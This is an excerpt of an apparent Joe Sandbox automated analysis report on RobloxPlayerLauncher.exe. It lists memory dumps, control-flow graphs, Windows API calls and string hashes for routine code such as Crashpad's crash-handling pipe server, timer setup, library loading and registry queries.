              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: DebugOutputString
              • String ID: expecting: $, got: $../../../util/win/exception_handler_server.cc$::GetNamedPipeClientProcessId$Check failed: RevertToSelf()$ImpersonateNamedPipeClient$bool __cdecl crashpad::ExceptionHandlerServer::ServiceClientConnection(const class crashpad::internal::PipeServiceContext &)$failed to open $forged client pid, real pid: $forged shutdown request, got: $kernel32.dll$unexpected version. got: $unhandled message type:
              • API String ID: 1166629820-2262201038
              • Opcode ID: 26630c3deb79b383693d5a84ead3f9d8a5b38021d3fbe4c0d1a2e3cfd2bea495
              • Instruction ID: a9cfeddd46ded9b6c5c09630ca71ec980c2de267fc0dd21ec27bf3e005430c25
              • Opcode Fuzzy Hash: 26630c3deb79b383693d5a84ead3f9d8a5b38021d3fbe4c0d1a2e3cfd2bea495
              • Instruction Fuzzy Hash: E1D1B331B40208ABDF10ABA8EC56FEEB7A5FF99700F500165F905BB2D2DB71AD458B50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 143 8be800-8be824 144 8be850-8be857 143->144 145 8be826-8be835 143->145 146 8be859-8be85b 144->146 147 8be8a2-8be8bc 144->147 145->144 157 8be837-8be84f 145->157 148 8be85d-8be866 146->148 149 8be887-8be8a1 call 8bf150 146->149 150 8be908-8be91c call 9e068c 147->150 151 8be8be-8be8d2 147->151 148->149 163 8be868-8be886 148->163 150->151 164 8be91e-8be933 timeGetDevCaps 150->164 155 8be8de-8be8e6 151->155 156 8be8d4-8be8dc call 8bf150 151->156 158 8be8eb-8be907 155->158 156->158 167 8be950-8be9f2 GetSystemTime SystemTimeToFileTime timeGetTime timeBeginPeriod timeSetEvent 164->167 168 8be935-8be94b call 71b180 call 9f7461 164->168 171 8bea0f-8bea26 call 9e0642 167->171 172 8be9f4-8bea0a call 71b180 call 9f7461 167->172 168->167 171->151 172->171
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: Failed timeGetDevCaps$Failed timeSetEvent
              • API String ID: 0-3522068268
              • Opcode ID: 797ced6951d89d3783cae9241c16bacfdf152d76c12f876cba9ad4bef44eab37
              • Instruction ID: 6122646d801d28e4506b063d17e2beb652d295a9659fe2a677a13dc972e2f364
              • Opcode Fuzzy Hash: 797ced6951d89d3783cae9241c16bacfdf152d76c12f876cba9ad4bef44eab37
              • Instruction Fuzzy Hash: 60517D75A00A09DFCB14DFA8D845AEAB7B8FF49710F004669F906E7360DB35A941CB91

              Control-flow Graph

              APIs
              • ConnectNamedPipe.KERNEL32(?,00000000), ref: 008B0E55
              • GetLastError.KERNEL32 ref: 008B0E5F
              • GetLastError.KERNEL32(ConnectNamedPipe), ref: 008B0E70
              • DisconnectNamedPipe.KERNEL32(?,00000000,ConnectNamedPipe), ref: 008B0EAC
              • DisconnectNamedPipe.KERNEL32(?), ref: 008B0EC4
              Strings
              • unsigned long __stdcall crashpad::ExceptionHandlerServer::PipeServiceProc(void *), xrefs: 008B0E82
              • ../../../util/win/exception_handler_server.cc, xrefs: 008B0E7D
              • ConnectNamedPipe, xrefs: 008B0E68
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: NamedPipe$DisconnectErrorLast$Connect
              • String ID: ../../../util/win/exception_handler_server.cc$ConnectNamedPipe$unsigned long __stdcall crashpad::ExceptionHandlerServer::PipeServiceProc(void *)
              • API String ID: 3779761632-1802093583
              • Opcode ID: 4ab676225477bed71152e754e3dae6030f143e3a16043f72e77a92412faa4d56
              • Instruction ID: 68d1504f58af6d05f9f00d5f389ca4cc662ae2409866189e7c52ac0e2c5ee9a1
              • Opcode Fuzzy Hash: 4ab676225477bed71152e754e3dae6030f143e3a16043f72e77a92412faa4d56
              • Instruction Fuzzy Hash: F6112B75A007146BDB20AF64ED06B9F7268FF51B04F000464F919E72D2D771F90086A6

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 201 a1a585-a1a591 202 a1a623-a1a626 201->202 203 a1a596-a1a5a7 202->203 204 a1a62c 202->204 205 a1a5b4-a1a5cd LoadLibraryExW 203->205 206 a1a5a9-a1a5ac 203->206 207 a1a62e-a1a632 204->207 210 a1a633-a1a643 205->210 211 a1a5cf-a1a5d8 GetLastError 205->211 208 a1a5b2 206->208 209 a1a64c-a1a64e 206->209 213 a1a620 208->213 209->207 210->209 212 a1a645-a1a646 FreeLibrary 210->212 214 a1a611-a1a61e 211->214 215 a1a5da-a1a5ec call a05ef7 211->215 212->209 213->202 214->213 215->214 218 a1a5ee-a1a600 call a05ef7 215->218 218->214 221 a1a602-a1a60f LoadLibraryExW 218->221 221->210 221->214
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,2912923C,?,00A1A692,?,?,?,00000000), ref: 00A1A646
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction ID: ef4435954a3024d8cb022ce834c76369283fce7908d7cdc0cd6769256ebdd45a
              • Opcode Fuzzy Hash: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction Fuzzy Hash: 0E213D76E06210ABCB329B64EC40ADB7BADDF51370F180120F815A72D1DB30ED41C6D1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 222 740900-74092a 223 740931-740936 222->223 223->223 224 740938-74094c 223->224 225 740965-740970 224->225 226 74094e 224->226 229 740973-740987 call 738a80 225->229 227 740950-740952 226->227 228 74095e-740963 226->228 227->225 230 740954-740956 227->230 228->229 235 740993-7409a8 229->235 236 740989-74098e 229->236 230->225 232 740958 230->232 232->228 234 74095a-74095c 232->234 234->225 234->228 237 740a15-740a26 235->237 238 7409aa 235->238 239 740ad5-740afc 236->239 248 740a2b-740a2e 237->248 242 7409b0-7409b2 238->242 240 740b42-740b44 239->240 241 740afe-740b0c call 9e2c2a 239->241 246 740b46-740b4b 240->246 247 740b4d-740b59 240->247 256 740b16-740b28 241->256 257 740b0e-740b11 call 739f50 241->257 244 7409b4 242->244 245 740a13 242->245 252 7409b6-7409b8 244->252 253 7409ba-7409d0 244->253 245->237 254 740b5c-740ba4 call 72c230 call 71b060 call 9f7461 246->254 247->254 249 740a87-740a8c 248->249 250 740a30-740a32 248->250 260 740a98-740ace 249->260 250->249 255 740a34-740a36 250->255 252->245 252->253 258 7409f2-7409fb 253->258 259 7409d2-7409d9 253->259 283 740ba6-740bac 254->283 284 740bae-740bb1 254->284 262 740a96 255->262 263 740a38 255->263 265 740b2f-740b41 256->265 266 740b2a 256->266 257->256 272 7409fe-740a01 258->272 259->258 267 7409db-7409f0 259->267 260->239 262->260 270 740a3e-740a54 263->270 271 740a3a-740a3c 263->271 266->265 267->272 275 740a76-740a7f 270->275 276 740a56-740a5d 270->276 271->262 271->270 277 740a03-740a06 272->277 278 740a0b-740a11 272->278 282 740a82-740a85 275->282 276->275 280 740a5f-740a74 276->280 277->260 278->242 280->282 282->249 285 740a8e-740a94 282->285 283->284 286 740bf2-740bfa 283->286 287 740bb3-740bb9 284->287 288 740bbb-740bbe 284->288 285->255 291 740bfc-740c02 286->291 292 740c08-740c0b 286->292 287->286 287->288 289 740bc0-740bc6 288->289 290 740bcc-740bd3 288->290 289->290 293 740cad-740cc3 289->293 294 740bd5-740bdb 290->294 295 740bdd-740be0 290->295 291->292 291->293 296 740c0d-740c13 292->296 297 740c2a-740c2c 292->297 294->286 294->295 301 740be6-740bec 295->301 302 740ca0-740ca3 295->302 296->297 298 740c15-740c17 296->298 299 740c53-740c56 297->299 300 740c2e-740c34 297->300 305 740ccd-740cdb 298->305 306 740c1d-740c1f 298->306 308 740c58-740c5e 299->308 309 740c79-740c85 call 747590 299->309 300->299 307 740c36-740c38 300->307 301->286 301->302 303 740ca5-740cab 302->303 304 740cc9-740ccb 302->304 303->293 303->304 304->305 306->305 310 740c25 306->310 307->305 311 740c3e-740c40 307->311 308->309 312 740c60-740c76 308->312 316 740cc6 309->316 317 740c87-740c9d 309->317 310->293 311->293 314 740c42-740c50 311->314 316->304
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00740B6F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: 38d4382a7f0d92c5ecdfa011b2c42fd59bfc779e97296395f6797cbb6b198698
              • Instruction ID: 2d968f8bddd46f249b0b3183a656bf462199299485ede6103a5463bacffe0add
              • Opcode Fuzzy Hash: 38d4382a7f0d92c5ecdfa011b2c42fd59bfc779e97296395f6797cbb6b198698
              • Instruction Fuzzy Hash: 25C18276A00205CFCB20CF68C480BA9B7A1EB59334F258399DA659B3E2D7399C45CBD1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 318 727770-72777b 319 7277a0-7277a2 318->319 320 72777d-727782 318->320 321 7277b1-7277b4 319->321 322 7277a4-7277a5 call 8bb2b0 319->322 323 7277b7 call 7273b0 320->323 324 727784-727785 call 8bb2b0 320->324 328 7277aa-7277ae 322->328 329 7277bc-7277dc call 9fb79f 323->329 330 72778a-727791 324->330 334 72782b call 7273b0 329->334 335 7277de-7277ef 329->335 330->329 331 727793-72779d 330->331 341 727830-72784b call 9fb79f 334->341 337 7277f1-7277f6 335->337 338 727814-727816 335->338 337->334 342 7277f8-727805 call 8bb2b0 337->342 339 727825-727828 338->339 340 727818-727822 call 8bb2b0 338->340 350 727891 call 7273b0 341->350 351 72784d-727855 341->351 342->341 349 727807-727811 342->349 357 727896-7278ab call 9fb79f 350->357 353 727857-72785c 351->353 354 72787a-72787c 351->354 353->350 358 72785e-72786b call 8bb2b0 353->358 355 72788b-72788e 354->355 356 72787e-727888 call 8bb2b0 354->356 367 7278f0 call 7273b0 357->367 368 7278ad-7278b4 357->368 358->357 365 72786d-727877 358->365 375 7278f5-7278fa call 9fb79f 367->375 369 7278b6-7278bb 368->369 370 7278d9-7278db 368->370 369->367 374 7278bd-7278ca call 8bb2b0 369->374 372 7278ea-7278ed 370->372 373 7278dd-7278de call 8bb2b0 370->373 372->367 379 7278e3-7278e7 373->379 374->375 382 7278cc-7278d6 374->382
              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 007277B7
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID:
              • API String ID: 118556049-0
              • Opcode ID: fdc051797dca0ee84c07ba9cfb187d5e66341f65009458954697ad8fd01d8bff
              • Instruction ID: 7c795e9f50e8b9145d3d9197ed34659efdc81a42cfe9b3d68d91c588ad85f44b
              • Opcode Fuzzy Hash: fdc051797dca0ee84c07ba9cfb187d5e66341f65009458954697ad8fd01d8bff
              • Instruction Fuzzy Hash: FB413CB25082184AE71CF7B4BA5AA6F73889F60350B044139F90DC7752FF39E964C266

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 407 7399c0-739a06 RegQueryValueExW 408 739a08-739a1a 407->408 409 739a2d-739a3c 407->409 408->409 411 739a3d-739a6a 408->411 412 739a70-739a79 411->412 412->412 413 739a7b-739a8a call 727e80 412->413 415 739a8f-739af7 call 8bd590 call 71c580 413->415 421 739b27-739b36 415->421 422 739af9-739b0b 415->422 423 739b1d-739b24 call 8bb340 422->423 424 739b0d-739b1b 422->424 423->421 424->423 425 739b37-739be0 call 9fb79f call 7275b0 call 7273b0 call 9fb79f 424->425 437 739be2-739be7 425->437 438 739c11-739c13 425->438 437->438 439 739c40-739c5d call 7273b0 call 9fb79f 437->439 440 739c15-739c2b call 8bb2b0 438->440 441 739c2e-739c3d 438->441 448 739ca7-739caa 439->448 449 739c5f 439->449 450 739c60-739c66 449->450 451 739c68-739c71 450->451 452 739c8f-739ca5 450->452 453 739c73-739c81 451->453 454 739c85-739c8c call 8bb340 451->454 452->448 452->450 453->454 455 739cad-739cb2 call 9fb79f 453->455 454->452
              APIs
              • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 007399FE
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 66a154be21ec5cbd4084e66653507b557601aa0888f8434c40baf49bab2d463a
              • Instruction ID: d9e49175db277bd2a915a42eafb5c51ddbfc727703fac990db596e5afd4630cd
              • Opcode Fuzzy Hash: 66a154be21ec5cbd4084e66653507b557601aa0888f8434c40baf49bab2d463a
              • Instruction Fuzzy Hash: A351D7729001189BDB14EFA8DC45BDEF7B9FF44310F108669EA18E7742E778A944CBA1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 460 a055b9-a055c6 call a19ea5 463 a05606-a05609 ExitThread 460->463 464 a055c8-a055d0 460->464 464->463 465 a055d2-a055d6 464->465 466 a055d8 call a1abc4 465->466 467 a055dd-a055e3 465->467 466->467 469 a055f0-a055f6 467->469 470 a055e5-a055e7 467->470 469->463 472 a055f8-a055fa 469->472 470->469 471 a055e9-a055ea CloseHandle 470->471 471->469 472->463 473 a055fc-a05600 FreeLibraryAndExitThread 472->473 473->463
              APIs
                • Part of subcall function 00A19EA5: GetLastError.KERNEL32(00000000,?,00A0424F,00A1A2ED,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A19EA9
                • Part of subcall function 00A19EA5: SetLastError.KERNEL32(00000000), ref: 00A19F4B
              • CloseHandle.KERNEL32(?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A055EA
              • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A05600
              • ExitThread.KERNEL32 ref: 00A05609
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
